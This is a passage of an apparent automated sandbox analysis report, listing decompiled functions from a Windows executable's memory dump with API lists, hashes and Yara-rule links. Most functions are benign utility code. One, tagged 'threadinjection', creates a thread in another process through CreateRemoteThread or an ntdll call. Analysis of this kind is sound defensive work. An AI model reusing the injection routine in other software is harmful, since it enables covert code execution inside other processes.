                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 2754987064-0
                                                                                      • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                      • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                      • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00408DC8, Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00408DC8(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x4101b4 == 0) {
					memcpy(0x40f5c8,  *__eax, 0x50);
					memcpy(0x40f2f8,  *(_t11 + 4), 0x2cc);
					 *0x4101b4 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E00408ADB, 0);
					 *0x4101b4 =  *0x4101b4 & 0x00000000;
					 *0x40f2f4 = _t7;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                      0x00408dd0
                                                                                      0x00408dd2
                                                                                      0x00408de2
                                                                                      0x00408df4
                                                                                      0x00408e01
                                                                                      0x00408e1b
                                                                                      0x00408e21
                                                                                      0x00408e28
                                                                                      0x00408e30
                                                                                      0x00408dd4
                                                                                      0x00408dd8
                                                                                      0x00408dd8

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                                      • String ID:
                                                                                      • API String ID: 1386444988-0
                                                                                      • Opcode ID: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction ID: 2efff09082e6186f10957894d43819ba35d003f4fc085d6afb87634920226402
                                                                                      • Opcode Fuzzy Hash: 891701deeecd0a5aff4f8729167f2b3d3e4c53b818b809e7ef3862d897c56b7c
                                                                                      • Instruction Fuzzy Hash: FAF08231695310BBD7206BA4BE0AB473AA0D700B16F2484BEF241B54E0C7FA04559BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004050E1, Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E004050E1(wchar_t* __edi, wchar_t* _a4) {
				int _t10;
				int _t12;
				void* _t23;
				wchar_t* _t24;
				signed int _t25;

				_t24 = __edi;
				_t25 = wcslen(__edi);
				_t10 = wcslen(_a4);
				_t23 = _t10 + _t25;
				if(_t23 >= 0x3ff) {
					_t12 = _t10 - _t23 + 0x3ff;
					if(_t12 > 0) {
						wcsncat(__edi + _t25 * 2, _a4, _t12);
					}
				} else {
					wcscat(__edi + _t25 * 2, _a4);
				}
				return _t24;
			}








                                                                                      0x004050e1
                                                                                      0x004050ec
                                                                                      0x004050ee
                                                                                      0x004050f5
                                                                                      0x004050ff
                                                                                      0x00405114
                                                                                      0x00405118
                                                                                      0x00405123
                                                                                      0x00405128
                                                                                      0x00405101
                                                                                      0x00405109
                                                                                      0x0040510f
                                                                                      0x0040512e

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcslen$wcscatwcsncat
                                                                                      • String ID:
                                                                                      • API String ID: 291873006-0
                                                                                      • Opcode ID: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction ID: d151cadb35ebc04527c95d650d15a6f00d765f1fde14687ca002c1c28d544fc6
                                                                                      • Opcode Fuzzy Hash: dae96c5ac082cb53d340fe27b4bc8b5cd34b90fa375a26752ac010ecfec8ae38
                                                                                      • Instruction Fuzzy Hash: 3CE0EC36908703AECB042625AC45C6F375DEF84368B50843FF410E6192EF3DD51556DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402DDD, Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00402DDD(struct HWND__* __eax, void* __ecx) {
				void* __edi;
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t14;
				struct HWND__* _t15;
				void* _t16;

				_t14 = __eax;
				_t16 = __ecx;
				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
				GetClientRect(__eax, __ecx + 0xa14);
				 *(_t16 + 0xa24) =  *(_t16 + 0xa24) & 0x00000000;
				_t15 = GetWindow(GetWindow(_t14, 5), 0);
				do {
					E00402D99(_t15, _t16);
					_t11 = GetWindow(_t15, 2);
					_t15 = _t11;
				} while (_t15 != 0);
				return _t11;
			}









                                                                                      0x00402de0
                                                                                      0x00402de2
                                                                                      0x00402dec
                                                                                      0x00402def
                                                                                      0x00402dfb
                                                                                      0x00402e0c
                                                                                      0x00402e0e
                                                                                      0x00402e0e
                                                                                      0x00402e16
                                                                                      0x00402e18
                                                                                      0x00402e1a
                                                                                      0x00402e21

                                                                                      APIs
                                                                                      • GetClientRect.USER32 ref: 00402DEF
                                                                                      • GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                      • GetWindow.USER32(00000000), ref: 00402E0A
                                                                                        • Part of subcall function 00402D99: GetWindowRect.USER32 ref: 00402DA8
                                                                                        • Part of subcall function 00402D99: MapWindowPoints.USER32 ref: 00402DC3
                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4235085887-0
                                                                                      • Opcode ID: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction ID: 77c271d885eafffee951e9f606c1c6e1ef1898ae553cc6e200c9330dee891b18
                                                                                      • Opcode Fuzzy Hash: 1c8c52d1646566c0c406de3dcd2af47f97e9d21a3de7b74f78bd3c756d76e5a1
                                                                                      • Instruction Fuzzy Hash: B8E092722407006BE22197398DC9FABB2EC9FC9761F11053EF504E7280DBB8DC014669
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040B6A6, Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 72%
                                                                                      			E0040B6A6() {
				intOrPtr _t1;
				intOrPtr _t2;
				intOrPtr _t3;
				intOrPtr _t4;

				_t1 =  *0x41c458;
				if(_t1 != 0) {
					_push(_t1);
					L0040B272();
				}
				_t2 =  *0x41c460;
				if(_t2 != 0) {
					_push(_t2);
					L0040B272();
				}
				_t3 =  *0x41c45c;
				if(_t3 != 0) {
					_push(_t3);
					L0040B272();
				}
				_t4 =  *0x41c464;
				if(_t4 != 0) {
					_push(_t4);
					L0040B272();
					return _t4;
				}
				return _t4;
			}







                                                                                      0x0040b6a6
                                                                                      0x0040b6ad
                                                                                      0x0040b6af
                                                                                      0x0040b6b0
                                                                                      0x0040b6b5
                                                                                      0x0040b6b6
                                                                                      0x0040b6bd
                                                                                      0x0040b6bf
                                                                                      0x0040b6c0
                                                                                      0x0040b6c5
                                                                                      0x0040b6c6
                                                                                      0x0040b6cd
                                                                                      0x0040b6cf
                                                                                      0x0040b6d0
                                                                                      0x0040b6d5
                                                                                      0x0040b6d6
                                                                                      0x0040b6dd
                                                                                      0x0040b6df
                                                                                      0x0040b6e0
                                                                                      0x00000000
                                                                                      0x0040b6e5
                                                                                      0x0040b6e6

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction ID: 3bd5cb9a150004800b4bedd87e83f43d671674f7d7a0a5890c52a9af046e0154
                                                                                      • Opcode Fuzzy Hash: ef9eb957481d268ec3f2fcbbe6b30702ac595c163cb660d0b33d8110378005bf
                                                                                      • Instruction Fuzzy Hash: 96E00261B8820196DD249A7AACD5D6B239C9A05794314847EF804E72E5DF39D44045ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00407362, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00407362(void* __ebx, void* __edx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				wchar_t* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				signed int _t39;
				wchar_t* _t41;
				signed int _t45;
				signed int _t48;
				wchar_t* _t53;
				wchar_t* _t62;
				void* _t66;
				intOrPtr* _t68;
				void* _t70;
				wchar_t* _t75;
				wchar_t* _t79;

				_t66 = __ebx;
				_t75 = 0;
				_v8 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t39 =  *( *((intOrPtr*)(_t66 + 0x30)) + _v8 * 4);
						_t68 = _a8;
						if(_t68 != _t75) {
							_t79 =  *((intOrPtr*)( *_t68))(_t39,  *((intOrPtr*)(_t66 + 0x60)));
						} else {
							_t79 =  *( *((intOrPtr*)(_t66 + 0x2d4)) + 0x10 + _t39 * 0x14);
						}
						_t41 = wcschr(_t79, 0x2c);
						_pop(_t70);
						if(_t41 != 0) {
							L8:
							_v20 = _t75;
							_v28 = _t75;
							_v36 = _t75;
							_v24 = 0x100;
							_v32 = 1;
							_v16 = 0x22;
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							while(1) {
								_t45 =  *_t79 & 0x0000ffff;
								__eflags = _t45;
								_v12 = _t45;
								_t77 =  &_v36;
								if(__eflags == 0) {
									break;
								}
								__eflags = _t45 - 0x22;
								if(__eflags != 0) {
									_push( &_v12);
									_t48 = 1;
									__eflags = 1;
								} else {
									_push(L"\"\"");
									_t48 = _t45 | 0xffffffff;
								}
								E0040565D(_t48, _t70, _t77, __eflags);
								_t79 =  &(_t79[0]);
								__eflags = _t79;
							}
							E0040565D( &_v16 | 0xffffffff, _t70,  &_v36, __eflags,  &_v16);
							_t53 = _v20;
							__eflags = _t53;
							if(_t53 == 0) {
								_t53 = 0x40c4e8;
							}
							E004055D1(E00407343(_t66, _a4, _t53),  &_v36);
							_t75 = 0;
							__eflags = 0;
						} else {
							_t62 = wcschr(_t79, 0x22);
							_pop(_t70);
							if(_t62 != 0) {
								goto L8;
							} else {
								E00407343(_t66, _a4, _t79);
							}
						}
						if(_v8 <  *((intOrPtr*)(_t66 + 0x2c)) - 1) {
							E00407343(_t66, _a4, ",");
						}
						_v8 = _v8 + 1;
					} while (_v8 <  *((intOrPtr*)(_t66 + 0x2c)));
				}
				return E00407343(_t66, _a4, L"\r\n");
			}























                                                                                      0x00407362
                                                                                      0x00407369
                                                                                      0x0040736e
                                                                                      0x00407371
                                                                                      0x00407378
                                                                                      0x0040737e
                                                                                      0x00407381
                                                                                      0x00407386
                                                                                      0x0040739f
                                                                                      0x00407388
                                                                                      0x00407391
                                                                                      0x00407391
                                                                                      0x004073a4
                                                                                      0x004073ac
                                                                                      0x004073ad
                                                                                      0x004073cd
                                                                                      0x004073d0
                                                                                      0x004073d3
                                                                                      0x004073d6
                                                                                      0x004073e0
                                                                                      0x004073e7
                                                                                      0x004073ee
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x0040741a
                                                                                      0x0040741d
                                                                                      0x00407420
                                                                                      0x00407423
                                                                                      0x00407426
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004073fc
                                                                                      0x00407400
                                                                                      0x0040740f
                                                                                      0x00407412
                                                                                      0x00407412
                                                                                      0x00407402
                                                                                      0x00407402
                                                                                      0x00407407
                                                                                      0x00407407
                                                                                      0x00407413
                                                                                      0x00407419
                                                                                      0x00407419
                                                                                      0x00407419
                                                                                      0x0040742f
                                                                                      0x00407434
                                                                                      0x00407437
                                                                                      0x00407439
                                                                                      0x0040743b
                                                                                      0x0040743b
                                                                                      0x0040744e
                                                                                      0x00407453
                                                                                      0x00407453
                                                                                      0x004073af
                                                                                      0x004073b2
                                                                                      0x004073ba
                                                                                      0x004073bb
                                                                                      0x00000000
                                                                                      0x004073bd
                                                                                      0x004073c3
                                                                                      0x004073c3
                                                                                      0x004073bb
                                                                                      0x0040745c
                                                                                      0x00407468
                                                                                      0x00407468
                                                                                      0x0040746d
                                                                                      0x00407473
                                                                                      0x0040747c
                                                                                      0x0040748e

                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 004073A4
                                                                                      • wcschr.MSVCRT ref: 004073B2
                                                                                        • Part of subcall function 0040565D: wcslen.MSVCRT ref: 00405679
                                                                                        • Part of subcall function 0040565D: memcpy.MSVCRT ref: 0040569D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcschr$memcpywcslen
                                                                                      • String ID: "
                                                                                      • API String ID: 1983396471-123907689
                                                                                      • Opcode ID: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction ID: 00b3f0686b04e7c82e40785714242b478475f00d1c6093d835cc4068bab83974
                                                                                      • Opcode Fuzzy Hash: 6c169a86a34af99064e62799b2294b8632790dd142111a0045f0f8e404fdb2fe
                                                                                      • Instruction Fuzzy Hash: 4E315F31E04208ABDF10EFA5C8819AE7BB9EF54314F20457BEC50B72C2D778AA41DB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 64%
                                                                                      			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                      0x0040a27d
                                                                                      0x0040a286
                                                                                      0x0040a290
                                                                                      0x0040a29d
                                                                                      0x00000000
                                                                                      0x0040a32f
                                                                                      0x0040a29f
                                                                                      0x0040a2a4
                                                                                      0x0040a2ad
                                                                                      0x0040a2b6
                                                                                      0x0040a2bc
                                                                                      0x0040a2be
                                                                                      0x0040a2c4
                                                                                      0x0040a2c8
                                                                                      0x0040a2ce
                                                                                      0x0040a2e3
                                                                                      0x0040a2ed
                                                                                      0x0040a2fb
                                                                                      0x0040a2fe
                                                                                      0x0040a305
                                                                                      0x0040a30c
                                                                                      0x0040a30f
                                                                                      0x0040a313
                                                                                      0x00000000
                                                                                      0x0040a31a
                                                                                      0x0040a338

                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?,74B068A0,00000000), ref: 0040A290
                                                                                      • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                        • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                        • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                      • String ID: $
                                                                                      • API String ID: 283512611-3993045852
                                                                                      • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                      • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                      • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 45%
                                                                                      			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                      0x00401676
                                                                                      0x0040167e
                                                                                      0x0040168a
                                                                                      0x0040168c
                                                                                      0x00401690
                                                                                      0x00401691
                                                                                      0x00401696
                                                                                      0x0040169d
                                                                                      0x004016a2
                                                                                      0x004016aa
                                                                                      0x004016aa
                                                                                      0x004016aa
                                                                                      0x004016ad
                                                                                      0x004016ae
                                                                                      0x004016b3
                                                                                      0x004016b9
                                                                                      0x004016bb
                                                                                      0x004016bc
                                                                                      0x004016c1
                                                                                      0x004016c8
                                                                                      0x004016cd
                                                                                      0x004016ce
                                                                                      0x004016ea
                                                                                      0x004016ff
                                                                                      0x0040170c
                                                                                      0x004016d0
                                                                                      0x004016e3
                                                                                      0x004016e3
                                                                                      0x00401711
                                                                                      0x00401714
                                                                                      0x00000000
                                                                                      0x00401719
                                                                                      0x0040171c

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf
                                                                                      • String ID: Line%d$Lines
                                                                                      • API String ID: 3988819677-2790224864
                                                                                      • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                      • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                      • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                      • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040512F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 70%
                                                                                      			E0040512F(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040B1EC();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}













                                                                                      0x00405132
                                                                                      0x00405135
                                                                                      0x00405139
                                                                                      0x0040513e
                                                                                      0x00405141
                                                                                      0x004051b3
                                                                                      0x00405143
                                                                                      0x00405145
                                                                                      0x00405147
                                                                                      0x0040514c
                                                                                      0x0040514e
                                                                                      0x00405151
                                                                                      0x00405151
                                                                                      0x0040515b
                                                                                      0x0040515c
                                                                                      0x0040515d
                                                                                      0x0040515e
                                                                                      0x0040515f
                                                                                      0x00405168
                                                                                      0x00405169
                                                                                      0x00405171
                                                                                      0x00405173
                                                                                      0x00405174
                                                                                      0x00405182
                                                                                      0x00405184
                                                                                      0x00405189
                                                                                      0x0040518c
                                                                                      0x00405194
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405196
                                                                                      0x0040519a
                                                                                      0x0040519b
                                                                                      0x004051a1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004051a1
                                                                                      0x004051a3
                                                                                      0x004051a3
                                                                                      0x004051a6
                                                                                      0x004051af
                                                                                      0x004051b0
                                                                                      0x004051b7

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintfmemcpy
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2789212964-323797159
                                                                                      • Opcode ID: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction ID: b76e4bbe2d26c53343c630e3245d096d82678977124e835a89109146ed91de65
                                                                                      • Opcode Fuzzy Hash: 66b7574eb9a61f89bba5daddfea12679ea202a088e21b7349ae655d3273dc8be
                                                                                      • Instruction Fuzzy Hash: 5A11A532900608BFEB01DFE8C882AAF77B9FB45314F104477ED14EB141D6789A058BD5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004075BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 43%
                                                                                      			E004075BB(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				char _v44;
				intOrPtr _t22;
				signed int _t30;
				signed int _t34;
				void* _t35;
				void* _t36;

				_t35 = __esi;
				_t34 = 0;
				if( *((intOrPtr*)(__esi + 0x2c)) > 0) {
					do {
						_t30 =  *( *((intOrPtr*)(__esi + 0x30)) + _t34 * 4);
						_t22 =  *((intOrPtr*)(_t30 * 0x14 +  *((intOrPtr*)(__esi + 0x40)) + 0xc));
						L0040B1EC();
						_push( *((intOrPtr*)( *_a8))(_t30,  *((intOrPtr*)(__esi + 0x64)),  &_v44, 0x14, L"%%-%d.%ds ", _t22, _t22));
						_push( &_v44);
						_push(0x2000);
						_push( *((intOrPtr*)(__esi + 0x60)));
						L0040B1EC();
						_t36 = _t36 + 0x24;
						E00407343(__esi, _a4,  *((intOrPtr*)(__esi + 0x60)));
						_t34 = _t34 + 1;
					} while (_t34 <  *((intOrPtr*)(__esi + 0x2c)));
				}
				return E00407343(_t35, _a4, L"\r\n");
			}









                                                                                      0x004075bb
                                                                                      0x004075c2
                                                                                      0x004075c7
                                                                                      0x004075ca
                                                                                      0x004075cd
                                                                                      0x004075d8
                                                                                      0x004075e9
                                                                                      0x004075fc
                                                                                      0x00407600
                                                                                      0x00407601
                                                                                      0x00407606
                                                                                      0x00407609
                                                                                      0x0040760e
                                                                                      0x00407619
                                                                                      0x0040761e
                                                                                      0x0040761f
                                                                                      0x00407624
                                                                                      0x00407636

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
